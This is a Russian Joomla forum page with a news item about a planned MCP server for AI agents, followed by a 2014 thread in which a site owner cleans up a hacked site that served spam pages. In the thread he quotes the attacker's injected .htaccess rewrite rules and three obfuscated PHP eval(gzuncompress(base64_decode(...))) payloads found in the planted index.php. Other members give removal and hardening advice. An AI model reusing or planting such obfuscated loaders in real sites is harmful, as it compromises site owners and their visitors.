Новости Joomla

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

Релиз безопасности Joomla 6.0.4 и Joomla 5.4.4

Проект Joomla! рад сообщить о выходе Joomla 6.0.4 и Joomla 5.4.4. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 18 Ответов
  • 3932 Просмотров
*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Здравствуйте.
На моем сайте были установелны страницы рекламного характера (про турбослим, чай для похудения), Яндекс вебмастер показывает свыше 500 новых этих спамных страниц. Эти страницы были установлены где-то 13 февраля, я узнал про них где-то 24 февраля.

Сайт находится на хостинге Таймвеб. На эти спамные страницы были проставлены ссылки с твитера, через акаунты этих твитов, я нашел другие сайты с такой же хакерской атакой. Все они были на хостинге Таймвеб. Техподдержка Таймвеба шаблоно отписалась.

Как удалить эти страницы?  !   В базе данных я удалил файлы относящихся к этим страницам (БД redirect_links), страницы остались.

Как удалить эти страницы?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт хакеры Joomla 3
« Ответ #2 : 28.02.2014, 09:04:30 »
Все они были на хостинге Таймвеб.

Подозрительно
*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Re: Взломали сайт хакеры Joomla 3
« Ответ #3 : 28.02.2014, 14:23:29 »
.htaccess посмортел, сравнил с денверским хтаксесом, обнаружил одну новую строчку:


 RewriteRule ^kiff(.*)$ /includes/js/$1 [L]


вирусные страницы начинаются с адреса http://сайт/kiff/...

kiff тут и там, значит если я удалю эту строчку в хтаксесе, удалятся эти вирусные страницы?
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт хакеры Joomla 3
« Ответ #4 : 28.02.2014, 14:25:24 »
Страницы скорее всего просто перестанут выводится. Надо еще узнать, как ломали.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломали сайт хакеры Joomla 3
« Ответ #5 : 28.02.2014, 14:29:31 »
RewriteRule ^kiff(.*)$ /includes/js/$1 [L]
kiff тут и там, значит если я удалю эту строчку в хтаксесе, удалятся эти вирусные страницы?
Смотри что в папке по пути /includes/js/
Правило редиректа конечно удаляй
*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Re: Взломали сайт хакеры Joomla 3
« Ответ #6 : 28.02.2014, 14:52:38 »
в папке по пути /includes/js/ два файла:

     .htaccess и Index.php.

в .htaccess написано только это:

     RewriteEngine On
RewriteBase /kiff

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule .* index.php

в Index.php написано:

<? eval(gzuncompress(base64_decode('eF6NUl1rwkAQ/Ct9KJyBUvxoxEPyYB9yPgjFKyQ2RUJyOVCb0qK0Nf763txalXonvsws7Mxmdi+3YvL0OJo8v7Kch/1BJxyEYc7m0Wi9LppWWWx0/yGvtPqodIupXrJkN/eGgRLQsODun+rFdpOmjMH8s3yv2y6VUUAQ8102k99qPI3cKohKowL7lcVYtlXMlxVkKaAGbKwr5tsqpVQaNAVEBP78x3SoLiQ06aDYZcBLu9DFsA/NvsaF7qmTrvp3M98OqXyzL9XdLogXtULxE/m/cbh0NkNl5oOcqdAgF93qZKdaC5t2de5SPWmVSpjXdM7c/1mNUdjbuGf4/YVI7L6Z2Oc699vU8piY0n6xIBj+AgSy1RM='))); ?><? eval(gzuncompress(base64_decode('eF6Njs1qg1AQhV8lCyEKXVxtTZHgwtSMtohNrs6glhL8uQHRaLAaCCXvXrWLdtfCLIbvzJlzjkOT92XbLA76o36vGaquy1KpfEqpaXVdepWXWBEnpJDAIKwqc3m3DIAjgmGH2xrCmh8Dsv7GccSSHdbFBisOHAwnVJ//IY/xfqhyiBhsOcwoPkEp9ua0pi5nud1ePC05Zy6tvOZF9bT+nJziWY5+Nwg4JjD+C34QIaNgfO1y1HEyOLNvnNfrbN195+w1YygcGoonFUW0qUfk2xab+mnEPPQv2ZQ6HSvrTvRD1yyy9EOsHg6FyNtCyFL6JpXvyvr2BVs5a5w='))); ?><? eval(gzuncompress(base64_decode('eF6Nk1FvmzAUhf8KrSwVa4xgwECGXClLnTZaBBWQvUTIQgyUaluIKDxUbf77rtNqgzaO9oAsuOc7+B5fI2ExdLuKv85W6eZKTKkXEBpQKq7yjZXrSKQ8+c6TjaA+dewpoVS3cG60Tb/7oVufbJPKB+MQCaI0IrkuBTa73Hbd/stkUjZ15Zvlvvi8L8rtz8Js+wkS1mX4UOsX1e9993TyzwTnGCPhsFNFG+dh9euxOm/hnLNw3yw0lYCCAAmXFW1bPOmDgofZ9eDVx8bgLYAiOEIEinxsGTQx5utkFd9nAhYD0lLrnbH+Pk6zxZKvblJDRbiScLHako4tE56tkyhLZlG64InRtX2lZr33LCAAnQpwCvErffx3MQA+u+VRdtKJWOesgrHVHZ/d8GSxjubZMo6GZ0MIhDIcmXkcf1tyjJ+RoGwohPOom7aCef2r0opHGBVPY9ew+PgZfICC8aLmCJVHL79JrTksuFgzVS1MZQs+Dg/KW2WNm3zdkyF3EB6qcttoSpIcSWio35XdQ7PTtvXRCongtQsVeJzUYBQgXP4LxuoC7s3LixJ0PoLef4HuR9D/B2IldxzoAIdt1fXtTh2F96Y7/AEfHFDZ'))); ?>

 код басе64 расшифровывает китайскими иероглифами (сайт /base64.ru/)   На денвере папки js нету.

Получается, если удалю папку js, то я избавлюсь от вируса полностью?

*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Re: Взломали сайт хакеры Joomla 3
« Ответ #7 : 28.02.2014, 22:14:21 »
Короче, удалил эту папку.


Спасибо за помощь, а то не знал что делать!  ^-^ ^-^ ^-^
*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Re: Взломали сайт хакеры Joomla 3
« Ответ #8 : 09.03.2014, 21:52:36 »
Скажите, пожайлуйста, а какая цель у этих хакеров? Вроде ссылок на другие сайты они не ставили.

Чего они добиваются таким способом?
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт хакеры Joomla 3
« Ответ #10 : 10.03.2014, 15:48:22 »
Скажите, пожайлуйста, а какая цель у этих хакеров? Вроде ссылок на другие сайты они не ставили.

Чего они добиваются таким способом?
Если у вас есть тИЦ на сайте, то это хорошая площадка для продвижения ДОРОВ, т.е дорвейщик, оптимизирует страницы под SEO, и выдвигает торговое предложение какой либо конторы, и при прогонах по определенным площадкам, эти страници занимают на какое то время топовые места по запросу в ПС, есть техники еще слива трафа, если от 1к уников в сутки, то вы тоже потенциальный клиент для взлома... если ведете коммерческую деятельность, то конкурентов может заинтересовать ваша БД. в результате обращаются к хакерам, ту можно много аспектов привести...
*

bgg87

  • Захожу иногда
  • 164
  • 2 / 0
  • Истина где-то рядом...
Re: Взломали сайт хакеры Joomla 3
« Ответ #11 : 28.06.2014, 15:41:40 »
если ведете коммерческую деятельность, то конкурентов может заинтересовать ваша БД
Подскажите как обезопасить себя?
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Взломали сайт хакеры Joomla 3
« Ответ #12 : 28.06.2014, 16:08:31 »
Регулярно обновляйте Joomla, дополнения ставьте только с Joomla.org, шаблоны только с официальных сайтов, делайте регулярную резервную копию (откатиться в 100 раз проще, чем лечить сайт)
Защищайте свой компьютер, часто ломают украв пароль от ftp с вашего компьютера. Нужен хороший антивирус и не сохраняйте пароли в ftp-менеджерах.
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Re: Взломали сайт хакеры Joomla 3
« Ответ #13 : 28.06.2014, 17:44:54 »
Подскажите как обезопасить себя?
Закройте админ, поставьте капчу, поставьте компонент защиты, закройте загрузку левых файлов в папку имедж и самое главное если не умеете лечить вирусы: НИКОГДА НЕ СТАВЬТЕ ВАРЕЗНЫЕ РАСШИРЕНИЯ
Мелкий ремонт. skype poisk-plus
*

bgg87

  • Захожу иногда
  • 164
  • 2 / 0
  • Истина где-то рядом...
Re: Взломали сайт хакеры Joomla 3
« Ответ #14 : 28.06.2014, 18:00:38 »
Закройте админ, поставьте капчу, поставьте компонент защиты, закройте загрузку левых файлов в папку имедж и самое главное если не умеете лечить вирусы: НИКОГДА НЕ СТАВЬТЕ ВАРЕЗНЫЕ РАСШИРЕНИЯ
Админку закрыли.
Капчу думал поставить, но для интернет магазина это имеет большой минус - клиенты, возраст которых около 30 лет, не ладят с компьютерами (основная часть) и порой лишнее поле для заполнения создает им проблему, из-за чего значительно падает количество заказов.
По поводу компонентов защиты - что посоветуете ставить?
« Последнее редактирование: 28.06.2014, 18:11:16 от bgg87 »
*

bgg87

  • Захожу иногда
  • 164
  • 2 / 0
  • Истина где-то рядом...
Re: Взломали сайт хакеры Joomla 3
« Ответ #15 : 28.06.2014, 18:09:50 »
Защищайте свой компьютер, часто ломают украв пароль от ftp с вашего компьютера. Нужен хороший антивирус и не сохраняйте пароли в ftp-менеджерах.
Спасибо за совет.
Действительно без антивируса никак, но и это не гарантия. Ставил несколько самых популярных и это не спасало (без названия, антирекламой не буду заниматься) :)
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт хакеры Joomla 3
« Ответ #16 : 28.06.2014, 18:33:14 »
Несколько самое то ставить :)
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
*

bgg87

  • Захожу иногда
  • 164
  • 2 / 0
  • Истина где-то рядом...
Re: Взломали сайт хакеры Joomla 3
« Ответ #18 : 28.06.2014, 18:49:25 »
Несколько самое то ставить :)
:)
имею ввиду подряд, а не одновременно! :)
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

Ответов: 1
Просмотров: 3820
Последний ответ 23.04.2024, 10:06:10
от wishlight
При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 4476
Последний ответ 31.03.2024, 16:14:32
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 4885
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 4675
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 2936
Последний ответ 05.11.2021, 21:47:31
от wishlight